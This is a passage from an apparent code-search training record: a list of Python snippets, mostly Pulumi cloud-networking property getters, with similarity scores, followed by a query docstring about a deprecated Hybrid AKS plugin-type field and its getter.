"def privacy_protocol_not(self, privacy_protocol_not):\n\n self._privacy_protocol_not = privacy_protocol_not",
"def disable_bgp_route_propagation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_bgp_route_propagation\")",
"def disable_bgp_route_propagation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_bgp_route_propagation\")",
"def allowNoIngressLabel(self):\n if (self.ingresslabels != None):\n return self.ingresslabels.isempty()\n elif self.layer != None:\n return self.layer.allowNoIngressLabel()\n return False # no layer means no restrictions",
"def _get_lsp_config_ospf_ignore_metric(self):\n return self.__lsp_config_ospf_ignore_metric",
"def public_access_behind_virtual_network_enabled(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"`public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"public_access_behind_virtual_network_enabled is deprecated: `public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\")\n\n return pulumi.get(self, \"public_access_behind_virtual_network_enabled\")",
"def public_access_behind_virtual_network_enabled(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"`public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"public_access_behind_virtual_network_enabled is deprecated: `public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\")\n\n return pulumi.get(self, \"public_access_behind_virtual_network_enabled\")",
"def enable_network_egress_metering(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_network_egress_metering\")",
"def attached_network_configuration(self) -> Optional[pulumi.Input['AttachedNetworkConfigurationArgs']]:\n return pulumi.get(self, \"attached_network_configuration\")",
"def attached_network_configuration(self) -> Optional[pulumi.Input['AttachedNetworkConfigurationArgs']]:\n return pulumi.get(self, \"attached_network_configuration\")",
"def Ipv4Flag(self):\r\n\t\treturn self._get_attribute('ipv4Flag')",
"def gateway_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"gateway_disabled\")",
"def gateway_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"gateway_disabled\")",
"def reason_to_be_disabled(cls):\n # Assume by default the given decoder is always enabled.\n return None",
"def client_ip_preservation_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"client_ip_preservation_enabled\")",
"def pre_network_ipam_create(self, resource_dict):\n pass",
"def disable_openapi_validation(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"disable_openapi_validation\")",
"def is_disable_apic(self):\n\t\treturn bool(call_sdk_function('PrlVmCfg_IsDisableAPIC', self.handle))",
"def deny(ip):\n return __apf_cmd(\"-d {}\".format(ip))",
"def disable():\n if _status_apf():\n return __apf_cmd(\"-f\")",
"def enabled(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"enabled is deprecated: This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\")\n\n return pulumi.get(self, \"enabled\")",
"def only_use_host_ips(self) -> Optional[pulumi.Input[Union[str, 'BfdEnabled']]]:\n return pulumi.get(self, \"only_use_host_ips\")",
"def disable_probe(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disable_probe\")",
"def disable_suppress_accessibility_service(self) -> Optional[bool]:\n return self.get_capability(DISABLE_SUPPRESS_ACCESSIBILITY_SERVICE)",
"def network_config(self) -> Optional[pulumi.Input['PrivateCloudNetworkConfigArgs']]:\n return pulumi.get(self, \"network_config\")",
"def get_disable_vpa(self) -> bool:\n return self._get_disable_vpa(enable_validation=True)",
"def accelerated_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"accelerated_network\")",
"def require_privmsg():\n def add_attribute(func):\n if not hasattr(func, \"priv_msg\"):\n func.priv_msg = True\n return func\n return add_attribute",
"def publicly_advertisable(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"publicly_advertisable\")",
"def enable_node_autoprovisioning(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_node_autoprovisioning\")",
"def disable_bgp_route_propagation(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"disable_bgp_route_propagation\")",
"def disability_specify(self, instance):\r\n return instance.user.profile.disability_specify",
"def ipv4_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ipv4_enabled\")",
"def disabled_by_microsoft(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"disabled_by_microsoft\")",
"def unclean_leader_election_enable(self) -> Optional[pulumi.Input[bool]]:\n warnings.warn(\"\"\"This field is deprecated and no longer functional.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"unclean_leader_election_enable is deprecated: This field is deprecated and no longer functional.\"\"\")\n\n return pulumi.get(self, \"unclean_leader_election_enable\")",
"def disable_probe(self) -> pulumi.Input[bool]:\n return pulumi.get(self, \"disable_probe\")",
"def enable_private_endpoint(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_private_endpoint\")",
"def enable_private_nodes(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_private_nodes\")",
"def enable_private_nodes(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_private_nodes\")",
"def isNoModifiable(self):\n return self.f4 is '-'",
"def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")",
"def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")",
"def is_no_storage_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_no_storage_enabled\")",
"def is_no_storage_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_no_storage_enabled\")",
"def fix_has_no_advisory(self):\n fixed_in = self.fixed_artifact()\n return fixed_in and fixed_in.vendor_no_advisory",
"def post_network_ipam_create(self, resource_dict):\n pass",
"def allow_virtual_network_access(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_virtual_network_access\")",
"def allow_virtual_network_access(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_virtual_network_access\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"disabled\")",
"def use_service_networking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"use_service_networking\")",
"def pre_network_ipam_update(self, resource_id, resource_dict):\n pass",
"def nfc_beam_disabled(self, nfc_beam_disabled):\n\n self._nfc_beam_disabled = nfc_beam_disabled",
"def auto_assign(self) -> Optional[pulumi.Input[Union[str, 'BfdEnabled']]]:\n return pulumi.get(self, \"auto_assign\")",
"def add_annotation_to_placement(self):\n\n config.switch_acm_ctx()\n placcement_obj = ocp.OCP(\n kind=constants.PLACEMENT_KIND,\n resource_name=self.appset_placement_name,\n namespace=\"openshift-gitops\",\n )\n placcement_obj.annotate(\n annotation=\"cluster.open-cluster-management.io/experimental-scheduling-disable='true'\"\n )",
"def check_disabled(self):\n return None",
"def public_access_behind_virtual_network_enabled(self) -> pulumi.Output[Optional[bool]]:\n warnings.warn(\"\"\"`public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"public_access_behind_virtual_network_enabled is deprecated: `public_access_behind_virtual_network_enabled` will be removed in favour of the property `public_network_access_enabled` in version 4.0 of the AzureRM Provider.\"\"\")\n\n return pulumi.get(self, \"public_access_behind_virtual_network_enabled\")",
"def privileged(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"privileged\")",
"def privileged(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"privileged\")",
"def __init__(__self__, *,\n enable_integrity_monitoring: Optional[pulumi.Input[bool]] = None,\n enable_secure_boot: Optional[pulumi.Input[bool]] = None):\n if enable_integrity_monitoring is not None:\n pulumi.set(__self__, \"enable_integrity_monitoring\", enable_integrity_monitoring)\n if enable_secure_boot is not None:\n pulumi.set(__self__, \"enable_secure_boot\", enable_secure_boot)",
"def email_protection_flag(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"email_protection_flag\")",
"def email_protection_flag(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"email_protection_flag\")",
"def enable(self):\n return self._packet.get('enable', False)\n\n # TODO: TCONT and GEM lists",
"def __init__(__self__, *,\n disable: Optional[pulumi.Input[bool]] = None):\n if disable is not None:\n pulumi.set(__self__, \"disable\", disable)",
"def core_network_attachment_arn(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"core_network_attachment_arn\")",
"def skip_metric_validation(self) -> Optional[bool]:\n return pulumi.get(self, \"skip_metric_validation\")",
"def skip_metric_validation(self) -> Optional[bool]:\n return pulumi.get(self, \"skip_metric_validation\")",
"def gateway_disabled(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"gateway_disabled\")",
"def is_ap(self, obj):\n return hasattr(obj, 'attachment_point_info')",
"def policy_net(self) -> bool:\n raise NotImplementedError()",
"def _disallow_public_access(self) -> typing.Optional[bool]:\n return jsii.get(self, \"disallowPublicAccess\")",
"def __init__(__self__, *,\n enabled: Optional[pulumi.Input[bool]] = None,\n evaluation_mode: Optional[pulumi.Input['BinaryAuthorizationEvaluationMode']] = None):\n if enabled is not None:\n warnings.warn(\"\"\"This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"enabled is deprecated: This field is deprecated. Leave this unset and instead configure BinaryAuthorization using evaluation_mode. If evaluation_mode is set to anything other than EVALUATION_MODE_UNSPECIFIED, this field is ignored.\"\"\")\n if enabled is not None:\n pulumi.set(__self__, \"enabled\", enabled)\n if evaluation_mode is not None:\n pulumi.set(__self__, \"evaluation_mode\", evaluation_mode)"
] | [
"0.60128003",
"0.60128003",
"0.57295716",
"0.56930447",
"0.5477912",
"0.5282392",
"0.5282392",
"0.52573335",
"0.5233392",
"0.5205244",
"0.5205244",
"0.5186832",
"0.5175805",
"0.5155281",
"0.51379627",
"0.51135457",
"0.5112992",
"0.51077884",
"0.50872314",
"0.5076411",
"0.50372726",
"0.50372726",
"0.50290173",
"0.4988413",
"0.4983122",
"0.4983122",
"0.49744266",
"0.49512318",
"0.49512318",
"0.49341083",
"0.49175653",
"0.49175653",
"0.4891726",
"0.48868865",
"0.48716608",
"0.4866823",
"0.48616725",
"0.4857399",
"0.48471162",
"0.48411426",
"0.4838005",
"0.48259526",
"0.4819597",
"0.48186466",
"0.47999376",
"0.47987777",
"0.47867328",
"0.47761276",
"0.47756547",
"0.4763553",
"0.47488573",
"0.47449958",
"0.47408843",
"0.47324088",
"0.4729748",
"0.47279128",
"0.47249806",
"0.47249806",
"0.47102675",
"0.47096336",
"0.47096336",
"0.47058025",
"0.47058025",
"0.47036517",
"0.46981844",
"0.46973774",
"0.46973774",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46915522",
"0.46822202",
"0.4679528",
"0.46665454",
"0.4666193",
"0.4662276",
"0.46464175",
"0.46439588",
"0.4635157",
"0.4635157",
"0.46347418",
"0.46323135",
"0.46323135",
"0.46314365",
"0.46280137",
"0.46268943",
"0.4623446",
"0.4623446",
"0.46122238",
"0.46066305",
"0.46018344",
"0.45978975",
"0.45971766"
] | 0.0 | -1 |
Field Deprecated. The field was previously optional, now it will have no defined behavior and will be ignored. The network plugin type for Hybrid AKS. | def hybrid_aks_plugin_type(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "hybrid_aks_plugin_type") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def network_plugin(self) -> Optional[pulumi.Input[Union[str, 'NetworkPlugin']]]:\n return pulumi.get(self, \"network_plugin\")",
"def network_plugin_mode(self) -> Optional[pulumi.Input[Union[str, 'NetworkPluginMode']]]:\n return pulumi.get(self, \"network_plugin_mode\")",
"def get_network_plugin(self) -> Union[str, None]:\n\n return self._get_network_plugin(enable_validation=True)",
"def get_network_plugin_mode(self) -> Union[str, None]:\n return self._get_network_plugin_mode(enable_validation=True)",
"def _get_network_plugin(self, enable_validation: bool = False) -> Union[str, None]:\n # read the original value passed by the command\n network_plugin = self.raw_param.get(\"network_plugin\")\n # try to read the property value corresponding to the parameter from the `mc` object\n if (\n self.mc and\n self.mc.network_profile and\n self.mc.network_profile.network_plugin is not None\n ):\n network_plugin = self.mc.network_profile.network_plugin\n\n # this parameter does not need dynamic completion\n # validation\n if enable_validation:\n (\n pod_cidr,\n service_cidr,\n dns_service_ip,\n docker_bridge_address,\n network_policy,\n ) = self._get_pod_cidr_and_service_cidr_and_dns_service_ip_and_docker_bridge_address_and_network_policy(\n enable_validation=False\n )\n network_plugin_mode = self._get_network_plugin_mode(enable_validation=False)\n if network_plugin:\n if network_plugin == \"azure\" and pod_cidr and network_plugin_mode != \"overlay\":\n raise InvalidArgumentValueError(\n \"Please specify network plugin mode `overlay` when using --pod-cidr or \"\n \"use network plugin `kubenet`. For more information about Azure CNI \"\n \"Overlay please see https://aka.ms/aks/azure-cni-overlay\"\n )\n else:\n if (\n pod_cidr or\n service_cidr or\n dns_service_ip or\n docker_bridge_address or\n network_policy\n ):\n raise RequiredArgumentMissingError(\n \"Please explicitly specify the network plugin type\"\n )\n return network_plugin",
"def get_plugin_description(self):\n return (\"L3 Router Service Plugin for basic L3 forwarding\"\n \" using OVN\")",
"def get_plugin_description(self):\n return (\"L3 Router Service Plugin for basic L3 forwarding\"\n \" using OVN\")",
"def _validate_network_plugin(\n self, context, network_info,\n plugin_type=projectpluginmap.NsxPlugins.NSX_V):\n if not network_info.get('network_id'):\n msg = _(\"network_id must be specified\")\n raise n_exc.BadRequest(resource=bgp_ext.BGP_SPEAKER_RESOURCE_NAME,\n msg=msg)\n net_id = network_info['network_id']\n p = self._core_plugin._get_plugin_from_net_id(context, net_id)\n if p.plugin_type() != plugin_type:\n msg = (_('Network should belong to the %s plugin as the bgp '\n 'speaker') % plugin_type)\n raise n_exc.InvalidInput(error_message=msg)",
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def AddNetworkFlag(parser):\n help_text = \"\"\"\\\n The VPC network from which the AlloyDB instance is accessible via private\n IP. For example, projects/myProject/global/networks/default. This setting\n cannot be updated after it is set.\n \"\"\"\n parser.add_argument('--network', help=help_text)",
"def network_configuration(self) -> Optional[pulumi.Input['ServiceNetworkConfigurationArgs']]:\n return pulumi.get(self, \"network_configuration\")",
"def network_configuration(self) -> Optional[pulumi.Input['ServiceNetworkConfigurationArgs']]:\n return pulumi.get(self, \"network_configuration\")",
"def network(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network\")",
"def use_service_networking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"use_service_networking\")",
"def scenario(self):\n warnings.simplefilter('always', PendingDeprecationWarning)\n warnings.warn(\n \"self.k.scenario will be deprecated in a future release. Please \"\n \"use self.k.network instead.\",\n PendingDeprecationWarning\n )\n return self.network",
"def get_ui_field_behaviour() -> dict[str, Any]:\n return {\n \"hidden_fields\": [\"port\", \"schema\"],\n \"relabeling\": {\"host\": \"Connection URL\"},\n }",
"def network_config(self) -> Optional[pulumi.Input['PrivateCloudNetworkConfigArgs']]:\n return pulumi.get(self, \"network_config\")",
"def __init__(self):\n self.id = None\n self.typeInfo['id'] = 'string'\n \"\"\"availability of the network offering\"\"\"\n self.availability = None\n self.typeInfo['availability'] = 'string'\n \"\"\"true if network offering is ip conserve mode enabled\"\"\"\n self.conservemode = None\n self.typeInfo['conservemode'] = 'boolean'\n \"\"\"the date this network offering was created\"\"\"\n self.created = None\n self.typeInfo['created'] = 'date'\n \"\"\"additional key/value details tied with network offering\"\"\"\n self.details = None\n self.typeInfo['details'] = 'map'\n \"\"\"an alternate display text of the network offering.\"\"\"\n self.displaytext = None\n self.typeInfo['displaytext'] = 'string'\n \"\"\"true if guest network default egress policy is allow; false if default egress policy is deny\"\"\"\n self.egressdefaultpolicy = None\n self.typeInfo['egressdefaultpolicy'] = 'boolean'\n \"\"\"true if network offering can be used by VPC networks only\"\"\"\n self.forvpc = None\n self.typeInfo['forvpc'] = 'boolean'\n \"\"\"guest type of the network offering, can be Shared or Isolated\"\"\"\n self.guestiptype = None\n self.typeInfo['guestiptype'] = 'string'\n \"\"\"true if network offering is default, false otherwise\"\"\"\n self.isdefault = None\n self.typeInfo['isdefault'] = 'boolean'\n \"\"\"true if network offering supports persistent networks, false otherwise\"\"\"\n self.ispersistent = None\n self.typeInfo['ispersistent'] = 'boolean'\n \"\"\"maximum number of concurrents connections to be handled by lb\"\"\"\n self.maxconnections = None\n self.typeInfo['maxconnections'] = 'integer'\n \"\"\"the name of the network offering\"\"\"\n self.name = None\n self.typeInfo['name'] = 'string'\n \"\"\"data transfer rate in megabits per second allowed.\"\"\"\n self.networkrate = None\n self.typeInfo['networkrate'] = 'integer'\n \"\"\"the ID of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingid = None\n self.typeInfo['secondaryserviceofferingid'] = 'string'\n \"\"\"the name of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingname = None\n self.typeInfo['secondaryserviceofferingname'] = 'string'\n \"\"\"the ID of the service offering used by virtual router provider\"\"\"\n self.serviceofferingid = None\n self.typeInfo['serviceofferingid'] = 'string'\n \"\"\"the name of the service offering used by virtual router provider\"\"\"\n self.serviceofferingname = None\n self.typeInfo['serviceofferingname'] = 'string'\n \"\"\"true if network offering supports specifying ip ranges, false otherwise\"\"\"\n self.specifyipranges = None\n self.typeInfo['specifyipranges'] = 'boolean'\n \"\"\"true if network offering supports vlans, false otherwise\"\"\"\n self.specifyvlan = None\n self.typeInfo['specifyvlan'] = 'boolean'\n \"\"\"state of the network offering. Can be Disabled/Enabled/Inactive\"\"\"\n self.state = None\n self.typeInfo['state'] = 'string'\n \"\"\"true if network offering supports network that span multiple zones\"\"\"\n self.supportsstrechedl2subnet = None\n self.typeInfo['supportsstrechedl2subnet'] = 'boolean'\n \"\"\"the tags for the network offering\"\"\"\n self.tags = None\n self.typeInfo['tags'] = 'string'\n \"\"\"the traffic type for the network offering, supported types are Public, Management, Control, Guest, Vlan or Storage.\"\"\"\n self.traffictype = None\n self.typeInfo['traffictype'] = 'string'\n \"\"\"the list of supported services\"\"\"\n self.service = []",
"def backend_plugin(self):\n return None",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def ip_protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_protocol\")",
"def _commercial_fields(self):\n return ['website']",
"def plugin_name(self):\n return \"optipng\"",
"def instance_charge_type(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n\n return pulumi.get(self, \"instance_charge_type\")",
"def instance_charge_type(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n\n return pulumi.get(self, \"instance_charge_type\")",
"def block_override_dns_type(self) -> str:\n return pulumi.get(self, \"block_override_dns_type\")",
"def __init__(__self__, *,\n datapath_provider: Optional[pulumi.Input['NetworkConfigDatapathProvider']] = None,\n default_snat_status: Optional[pulumi.Input['DefaultSnatStatusArgs']] = None,\n dns_config: Optional[pulumi.Input['DNSConfigArgs']] = None,\n enable_intra_node_visibility: Optional[pulumi.Input[bool]] = None,\n enable_l4ilb_subsetting: Optional[pulumi.Input[bool]] = None,\n gateway_api_config: Optional[pulumi.Input['GatewayAPIConfigArgs']] = None,\n private_ipv6_google_access: Optional[pulumi.Input['NetworkConfigPrivateIpv6GoogleAccess']] = None,\n service_external_ips_config: Optional[pulumi.Input['ServiceExternalIPsConfigArgs']] = None):\n if datapath_provider is not None:\n pulumi.set(__self__, \"datapath_provider\", datapath_provider)\n if default_snat_status is not None:\n pulumi.set(__self__, \"default_snat_status\", default_snat_status)\n if dns_config is not None:\n pulumi.set(__self__, \"dns_config\", dns_config)\n if enable_intra_node_visibility is not None:\n pulumi.set(__self__, \"enable_intra_node_visibility\", enable_intra_node_visibility)\n if enable_l4ilb_subsetting is not None:\n pulumi.set(__self__, \"enable_l4ilb_subsetting\", enable_l4ilb_subsetting)\n if gateway_api_config is not None:\n pulumi.set(__self__, \"gateway_api_config\", gateway_api_config)\n if private_ipv6_google_access is not None:\n pulumi.set(__self__, \"private_ipv6_google_access\", private_ipv6_google_access)\n if service_external_ips_config is not None:\n pulumi.set(__self__, \"service_external_ips_config\", service_external_ips_config)",
"def type(self, type):\n allowed_values = [\"android\", \"ios\"]\n if type.lower() not in map(str.lower, allowed_values):\n # print(\"Invalid value for type -> \" + type)\n self._type = \"outdated_sdk_version\"\n else:\n self._type = type",
"def network_dataplane(self) -> Optional[pulumi.Input[Union[str, 'NetworkDataplane']]]:\n return pulumi.get(self, \"network_dataplane\")",
"def spec(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def spec(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def type(self) -> Optional[pulumi.Input['ClusterTelemetryType']]:\n return pulumi.get(self, \"type\")",
"def network_config(self) -> pulumi.Input['PrivateCloudNetworkConfigArgs']:\n return pulumi.get(self, \"network_config\")",
"def protocol(self):\n raise UnsupportedCall(f\"'{self.__class__.__name__}' object has no attribute 'protocol'\")",
"def internet_advertising_disabled(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def network_config(self) -> Optional[pulumi.Input['NodeNetworkConfigArgs']]:\n return pulumi.get(self, \"network_config\")",
"def trafficProtocol(self):\n #\n # TODO: Reimplement this if possible.\n #\n return client.trafficProtocol(self)",
"def network_interface(self): \n return self._network_interface",
"def network_mode(self) -> Optional[pulumi.Input[Union[str, 'NetworkMode']]]:\n return pulumi.get(self, \"network_mode\")",
"def network(self) -> str:\n return pulumi.get(self, \"network\")",
"def protocol(self) -> Optional[pulumi.Input[Union[str, 'Protocol']]]:\n return pulumi.get(self, \"protocol\")",
"def get_network_dataplane(self) -> Union[str, None]:\n return self.raw_param.get(\"network_dataplane\")",
"def _configure_neutron_api(self):\n logging.info('Configuring `manage-neutron-plugin-legacy-mode` for '\n 'neutron-api...')\n n_api_config = {\n 'manage-neutron-plugin-legacy-mode': False,\n }\n with self.config_change(\n n_api_config, n_api_config, 'neutron-api'):\n logging.info('done')",
"def plugin_type(self) -> Optional[pulumi.Input[Union[str, 'KubernetesPluginType']]]:\n return pulumi.get(self, \"plugin_type\")",
"def plugin_type(self) -> Optional[pulumi.Input[Union[str, 'KubernetesPluginType']]]:\n return pulumi.get(self, \"plugin_type\")",
"def plugin_type(self) -> Optional[pulumi.Input[Union[str, 'KubernetesPluginType']]]:\n return pulumi.get(self, \"plugin_type\")",
"def add_field(self, field_name, label, description, type, function=None):\n new_field = {\n \"label\": label,\n \"description\": description,\n \"type\": type,\n }\n if function is not None:\n new_field[\"source\"] = \"function\"\n self.fields[field_name] = function\n else:\n new_field[\"source\"] = \"system\"\n self.fields[field_name] = \"No value\"\n self.description[\"fields\"][\"values\"][field_name] = new_field\n\n # update MongoDB\n #self.mongo_client.cps2_project.objects.update_one(\n #{\"_id\": self.mongo_id},\n #{\"$set\": {\"fields.values.\" + field_name: new_field,\n #\"last_modified.value\": str(datetime.utcnow())}\n #}\n #)\n print(\"Added a new field called \\\"\" + field_name + \"\\\" and updated MongoDB.\")",
"def provider(self) -> Optional[pulumi.Input['NetworkPolicyProvider']]:\n return pulumi.get(self, \"provider\")",
"def node_topology(self) -> \"LabelSelector\":\n return typing.cast(\n \"LabelSelector\",\n self._properties.get(\"nodeTopology\"),\n )",
"def get_default_config(self):\n if not self.iface_type:\n return None\n\n defaults = {}\n defaults['description'] = self.interface_name + ' Interface'\n defaults['admin'] = 'up'\n if self.is_ethernet:\n defaults['speed'] = 'auto'\n defaults['duplex'] = 'auto'\n defaults['type'] = 'bridged'\n elif self.iface_type == 'Bridge-Aggregation':\n defaults['type'] = 'bridged'\n else:\n defaults['type'] = 'routed'\n\n return defaults",
"def server_type(self):\n ...",
"def accelerated_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"accelerated_network\")",
"def get_plugin_type(self):\n return constants.L2GW",
"def set_network_connection_type(self,param={},ignore_error_handle = False):\n message = {};\n step = 'set network connection type \\'' + str(param.get('network_type',0)) + '\\'';\n network_type = param.get('network_type',0);\n try:\n if network_type == 0:\n self.driver.set_network_connection(ConnectionType.NO_CONNECTION);\n elif network_type == 1:\n self.driver.set_network_connection(ConnectionType.AIRPLANE_MODE);\n elif network_type == 2:\n self.driver.set_network_connection(ConnectionType.WIFI_ONLY);\n elif network_type == 4:\n self.driver.set_network_connection(ConnectionType.DATA_ONLY);\n elif network_type == 6:\n self.driver.set_network_connection(ConnectionType.ALL_NETWORK_ON);\n else:\n self.driver.set_network_connection(ConnectionType.NO_CONNECTION);\n message = self.feedback.feedback_action_ok(step);\n except BaseException,e:\n message = self.feedback.feedback_action_fail(step,str(e),ignore_error_handle);\n finally:\n return message;",
"def getProtocol(self) -> str:\n ...",
"def ip_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_type\")",
"def __init__(__self__, *,\n ip_tag_type: Optional[pulumi.Input[str]] = None,\n tag: Optional[pulumi.Input[str]] = None):\n if ip_tag_type is not None:\n pulumi.set(__self__, \"ip_tag_type\", ip_tag_type)\n if tag is not None:\n pulumi.set(__self__, \"tag\", tag)",
"def __init__(__self__, *,\n type: Optional[pulumi.Input['ClusterTelemetryType']] = None):\n if type is not None:\n pulumi.set(__self__, \"type\", type)",
"def protocol(self):\n ...",
"def network_profile(self) -> Optional[pulumi.Input['NetworkProfileArgs']]:\n return pulumi.get(self, \"network_profile\")",
"def network_profile(self) -> Optional[pulumi.Input['NetworkProfileArgs']]:\n return pulumi.get(self, \"network_profile\")",
"def _get_protocol_type(self):\n return self.__protocol_type",
